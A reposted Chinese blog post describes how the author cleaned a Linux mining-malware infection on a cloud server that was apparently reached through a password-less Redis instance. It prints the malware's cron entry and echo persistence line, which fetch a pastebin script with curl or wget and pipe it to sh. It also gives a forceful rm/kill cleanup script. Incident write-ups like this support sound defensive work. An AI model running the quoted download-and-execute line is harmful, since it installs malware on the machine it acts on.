碼上快樂

相關內容    簡體    繁體

最近3月殺死linux挖礦病毒

本文轉載自   查看原文   2019-03-19 10:13   3040    /tmp/kintegrityds/ kthrotlds/ kpsmouseds/ pastebin.com/ ksoftirqds

最近從2月17號開始一直收到阿里雲的報警信息;

您的雲服務器(120.78.158.127)由於被檢測到對外攻擊,已阻斷該服務器對其它服務器端口(TCP:3389)的訪問,阻斷預計將在2019-03-19 11:46:21時間內結束,請及時進行安全自查。若有疑問,請工單或電話聯系阿里雲售后,感謝您對阿里雲的支持。

 

 

crontab -l 查看定時任務發現有 */15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh
明顯是一段挖礦程序

redis也有一個Cache鍵里放着這個字段*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh

所以我認為是我redis沒設密碼導致的,具體他是怎么通過redis來傾入,這個不得而知,后續再探究。

sed -i 刪除指定任務
太強了有個腳本程序一直在執行echo "*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh" >> /var/spool/cron/root

busybox top 才能得到未被劫持的so執行程序。

#先要關掉crond,防止在清除過程中又開始下載腳本
service crond stop

# 刪除劫持的libcset.so預加載動態鏈接庫,隱藏病毒

# 清理異常進程

# 再次清理異常進程

# 清理開機啟動項

 殺毒代碼合並ksoftirqds,kthrotlds,kpsmouseds,kintegrityds殺毒

service crond stop

busybox rm -f /etc/ld.so.preload
busybox rm -f /usr/local/lib/libcset.so
chattr -i /etc/ld.so.preload
busybox rm -f /etc/ld.so.preload
busybox rm -f /usr/local/lib/libcset.so

# 清理異常進程
busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'kpsmouseds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'kintegrityds' | busybox awk '{print $1}' | busybox xargs kill -9

busybox rm -f /tmp/kthrotlds
busybox rm -f /tmp/kintegrityds
busybox rm -f /tmp/kpsmouseds
busybox rm -f /etc/cron.d/tomcat
busybox rm -f /etc/cron.d/root
busybox rm -f /var/spool/cron/root
busybox rm -f /var/spool/cron/crontabs/root
busybox rm -f /etc/rc.d/init.d/kthrotlds
busybox rm -f /etc/rc.d/init.d/kpsmouseds
busybox rm -f /etc/rc.d/init.d/kintegrityds
busybox rm -f /usr/sbin/kthrotlds
busybox rm -f /usr/sbin/kintegrityds
busybox rm -f /usr/sbin/kpsmouseds
busybox rm -f /etc/init.d/netdns


ldconfig

# 再次清理異常進程
busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'kpsmouseds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'kintegrityds' | busybox awk '{print $1}' | busybox xargs kill -9

# 清理開機啟動項
chkconfig netdns off
chkconfig –del netdns

service crond start
echo "Done, Please reboot!"


# sidie@moresec

  具體殺毒解析流程見:https://www.anquanke.com/post/id/172111

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 Linux被kdevtmpfsi 挖礦病毒入侵 Linux應急響應(三):挖礦病毒 linux實戰清理挖礦病毒kthreaddi Linux挖礦病毒 khugepageds詳細解決步驟 解決linux挖礦病毒(kdevtmpfsi,sysupdate, networkservice) Linux下挖礦病毒解決記錄 linux常見挖礦病毒清理教程 Linux 下qW3xT.2挖礦病毒處理 Linux 服務器上有挖礦病毒處理【分析+解決】 linux 服務器發現了挖礦病毒
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM